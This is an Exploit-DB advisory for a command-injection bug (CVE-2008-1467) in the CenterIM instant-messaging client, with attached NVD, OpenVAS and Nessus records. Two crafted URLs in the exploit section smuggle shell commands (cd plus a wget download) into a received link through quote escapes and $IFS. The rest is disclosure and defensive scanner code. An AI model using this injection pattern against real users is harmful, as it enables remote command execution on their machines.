ID EDB-ID:5283 Type exploitdb Reporter Brian Fonfara Modified 2008-03-20T00:00:00
Description
CenterIM <= 4.22.3 Remote Command Execution Vulnerability. CVE-2008-1467. Remote exploit for linux platform
#######################################################################
Application: CenterIM
http://www.centerim.org/index.php/Main_Page
Versions: centerim <= 4.22.3
OS: Linux
Bug: Execution of shell commands
Exploit: remote
Date: 15 March 2008
Author: Brian Fonfara (w00)
eMail: brian.fonfara@gmx.de
Web: newb.kicks-ass.net
#######################################################################
1) Bug
2) Exploit
#######################################################################
=======
1) Bug
=======
Received URLs in the message window do not get checked for illegal
characters, like "\'", "\"", ";", "$", "{", "}", "&&" and "||"
#######################################################################
===========
2) Exploit
===========
Standard settings:
- Browser already open:
http://gidf.de/centerim)';cd$IFS$HOME/Desktop;wget${IFS}http://google.de;'(
- New browser instance:
http://gidf.de/centerim"&cd$IFS$HOME/Desktop;wget${IFS}http://google.de"
#######################################################################
Greets to: mrks
# milw0rm.com [2008-03-20]
{"id": "EDB-ID:5283", "type": "exploitdb", "bulletinFamily": "exploit", "title": "CenterIM <= 4.22.3 - Remote Command Execution Vulnerability", "description": "CenterIM <= 4.22.3 Remote Command Execution Vulnerability. CVE-2008-1467. Remote exploit for linux platform", "published": "2008-03-20T00:00:00", "modified": "2008-03-20T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5283/", "reporter": "Brian Fonfara", "references": [], "cvelist": ["CVE-2008-1467"], "lastseen": "2016-01-31T21:54:25", "viewCount": 9, "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2016-01-31T21:54:25", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-1467"]}, {"type": "openvas", "idList": ["OPENVAS:860677", "OPENVAS:860043"]}, {"type": "nessus", "idList": ["FEDORA_2008-2867.NASL", "FEDORA_2008-2869.NASL"]}], "modified": "2016-01-31T21:54:25", "rev": 2}, "vulnersScore": 7.8}, "sourceHref": "https://www.exploit-db.com/download/5283/", "sourceData": "#######################################################################\n\nApplication: CenterIM\n http://www.centerim.org/index.php/Main_Page\nVersions: centerim <= 4.22.3\nOS: Linux\nBug: Execution of shell commands\nExploit: remote\nDate: 15 March 2008\nAuthor: Brian Fonfara (w00)\n eMail: brian.fonfara@gmx.de\n Web: newb.kicks-ass.net\n\n\n#######################################################################\n\n1) Bug\n2) Exploit\n\n\n#######################################################################\n\n=======\n1) Bug\n=======\n\nReceived URLs in the message window do not get checked for illegal\ncharacters, like \"\\'\", \"\\\"\", \";\", \"$\", \"{\", \"}\", \"&&\" and \"||\"\n\n#######################################################################\n\n===========\n2) Exploit\n===========\n\nStandard settings:\n- Browser already open:\nhttp://gidf.de/centerim)';cd$IFS$HOME/Desktop;wget${IFS}http://google.de;'(\n\n- New browser instance:\nhttp://gidf.de/centerim\"&cd$IFS$HOME/Desktop;wget${IFS}http://google.de\"\n\n#######################################################################\n\nGreets to: mrks\n\n# milw0rm.com [2008-03-20]\n", "osvdbidlist": ["43510"], "immutableFields": []}
{"cve": [{"lastseen": "2021-04-21T20:41:33", "description": "** DISPUTED ** CenterIM 4.22.3 and earlier allows user-assisted remote attackers to execute arbitrary commands via shell metacharacters in a URI, related to \"received URLs in the message window.\" NOTE: this issue has been disputed due to the user-assisted nature, since the URL must be selected and launched by the victim.", "edition": 5, "cvss3": {}, "published": "2008-03-24T21:44:00", "title": "CVE-2008-1467", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1467"], "modified": "2017-09-29T01:30:00", "cpe": ["cpe:/a:centerim:centerim:4.22.3"], "id": "CVE-2008-1467", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1467", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:centerim:centerim:4.22.3:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-25T10:56:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1467"], "description": "Check for the Version of centerim", "modified": "2017-07-10T00:00:00", "published": "2009-02-16T00:00:00", "id": "OPENVAS:860043", "href": "http://plugins.openvas.org/nasl.php?oid=860043", "type": "openvas", "title": "Fedora Update for centerim FEDORA-2008-2869", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for centerim FEDORA-2008-2869\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"centerim on Fedora 7\";\ntag_insight = \"CenterIM is a text mode menu- and window-driven IM interface that supports\n the ICQ2000, Yahoo!, MSN, AIM TOC, IRC, Gadu-Gadu and Jabber protocols.\n Internal RSS reader and a client for LiveJournal are provided.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-April/msg00076.html\");\n script_id(860043);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-16 16:22:52 +0100 (Mon, 16 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2008-2869\");\n script_cve_id(\"CVE-2008-1467\");\n script_name( \"Fedora Update for centerim FEDORA-2008-2869\");\n\n script_summary(\"Check for the Version of centerim\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"centerim\", rpm:\"centerim~4.22.4~1.fc7.1\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:57:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1467"], "description": "Check for the Version of centerim", "modified": "2017-07-10T00:00:00", "published": "2009-02-16T00:00:00", "id": "OPENVAS:860677", "href": "http://plugins.openvas.org/nasl.php?oid=860677", "type": "openvas", "title": "Fedora Update for centerim FEDORA-2008-2867", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for centerim FEDORA-2008-2867\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"centerim on Fedora 8\";\ntag_insight = \"CenterIM is a text mode menu- and window-driven IM interface that supports\n the ICQ2000, Yahoo!, MSN, AIM TOC, IRC, Gadu-Gadu and Jabber protocols.\n Internal RSS reader and a client for LiveJournal are provided.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-April/msg00073.html\");\n script_id(860677);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-16 16:22:52 +0100 (Mon, 16 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2008-2867\");\n script_cve_id(\"CVE-2008-1467\");\n script_name( \"Fedora Update for centerim FEDORA-2008-2867\");\n\n script_summary(\"Check for the Version of centerim\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC8\")\n{\n\n if ((res = isrpmvuln(pkg:\"centerim\", rpm:\"centerim~4.22.4~1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1467"], "description": "CenterIM is a text mode menu- and window-driven IM interface that supports the ICQ2000, Yahoo!, MSN, AIM TOC, IRC, Gadu-Gadu and Jabber protocols. Internal RSS reader and a client for LiveJournal are provided. ", "modified": "2008-04-01T21:38:25", "published": "2008-04-01T21:38:25", "id": "FEDORA:M31LJPQM016718", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: centerim-4.22.4-1.fc8", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1467"], "description": "CenterIM is a text mode menu- and window-driven IM interface that supports the ICQ2000, Yahoo!, MSN, AIM TOC, IRC, Gadu-Gadu and Jabber protocols. Internal RSS reader and a client for LiveJournal are provided. ", "modified": "2008-04-01T21:38:37", "published": "2008-04-01T21:38:37", "id": "FEDORA:M31LJGMA016756", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: centerim-4.22.4-1.fc7.1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-12T10:06:29", "description": "This update fixes the CVE-2008-1467 security issue by disabling the\n'actions' configuration altogether. Furthermore the default web\nbrowser is no longer configurable in CenterIM. The links get open in\nthe default web browser configured, using xdg-utils. There won't be\nany update for centericq. All users of centericq packages are advised\nto switch to centerim. In Fedora 7 centerim package provides symbolic\nlink 'centericq' that points to centerim binary for compatibility with\ncentericq. Note that centerim packages in later releases of Fedora no\nlonger provide this. CenterIM will automatically use CenterICQ\nsettings if ones are found in all releases of Fedora. This release\nadds support for new versions of Yahoo IM protocol. Unless you apply\nthis update, you won't be able to use Yahoo IM after April 2nd 2008.\nPlease note: To avoid compatibility and confidentiality problems with\nan undocumented protocol transported unencrypted over third-party\ncontrolled network, all users of Yahoo IM protocol are encouraged to\nswitch to open and free alternatives, such as XMPP used in Jabber\nnetwork.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2008-04-04T00:00:00", "title": "Fedora 7 : centerim-4.22.4-1.fc7.1 (2008-2869)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1467"], "modified": "2008-04-04T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:7", "p-cpe:/a:fedoraproject:fedora:centerim"], "id": "FEDORA_2008-2869.NASL", "href": "https://www.tenable.com/plugins/nessus/31749", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-2869.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(31749);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-1467\");\n script_xref(name:\"FEDORA\", value:\"2008-2869\");\n\n script_name(english:\"Fedora 7 : centerim-4.22.4-1.fc7.1 (2008-2869)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the CVE-2008-1467 security issue by disabling the\n'actions' configuration altogether. Furthermore the default web\nbrowser is no longer configurable in CenterIM. The links get open in\nthe default web browser configured, using xdg-utils. There won't be\nany update for centericq. All users of centericq packages are advised\nto switch to centerim. In Fedora 7 centerim package provides symbolic\nlink 'centericq' that points to centerim binary for compatibility with\ncentericq. Note that centerim packages in later releases of Fedora no\nlonger provide this. CenterIM will automatically use CenterICQ\nsettings if ones are found in all releases of Fedora. This release\nadds support for new versions of Yahoo IM protocol. Unless you apply\nthis update, you won't be able to use Yahoo IM after April 2nd 2008.\nPlease note: To avoid compatibility and confidentiality problems with\nan undocumented protocol transported unencrypted over third-party\ncontrolled network, all users of Yahoo IM protocol are encouraged to\nswitch to open and free alternatives, such as XMPP used in Jabber\nnetwork.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=438871\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-April/009101.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fa8f1dcf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected centerim package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:centerim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/04/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 7.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC7\", reference:\"centerim-4.22.4-1.fc7.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"centerim\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:06:29", "description": "This update fixes the CVE-2008-1467 security issue by disabling the\n'actions' configuration altogether. Furthermore the default web\nbrowser is no longer configurable in CenterIM. The links get open in\nthe default web browser configured, using xdg-utils. This release adds\nsupport for new versions of Yahoo IM protocol. Unless you apply this\nupdate, you won't be able to use Yahoo IM after April 2nd 2008. Please\nnote: To avoid compatibility and confidentiality problems with an\nundocumented protocol transported unencrypted over third-party\ncontrolled network, all users of Yahoo IM protocol are encouraged to\nswitch to open and free alternatives, such as XMPP used in Jabber\nnetwork.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2008-04-04T00:00:00", "title": "Fedora 8 : centerim-4.22.4-1.fc8 (2008-2867)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1467"], "modified": "2008-04-04T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:8", "p-cpe:/a:fedoraproject:fedora:centerim"], "id": "FEDORA_2008-2867.NASL", "href": "https://www.tenable.com/plugins/nessus/31747", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-2867.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(31747);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-1467\");\n script_xref(name:\"FEDORA\", value:\"2008-2867\");\n\n script_name(english:\"Fedora 8 : centerim-4.22.4-1.fc8 (2008-2867)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the CVE-2008-1467 security issue by disabling the\n'actions' configuration altogether. Furthermore the default web\nbrowser is no longer configurable in CenterIM. The links get open in\nthe default web browser configured, using xdg-utils. This release adds\nsupport for new versions of Yahoo IM protocol. Unless you apply this\nupdate, you won't be able to use Yahoo IM after April 2nd 2008. Please\nnote: To avoid compatibility and confidentiality problems with an\nundocumented protocol transported unencrypted over third-party\ncontrolled network, all users of Yahoo IM protocol are encouraged to\nswitch to open and free alternatives, such as XMPP used in Jabber\nnetwork.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=438871\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-April/009098.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0b738808\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected centerim package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:centerim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/04/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"centerim-4.22.4-1.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"centerim\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}
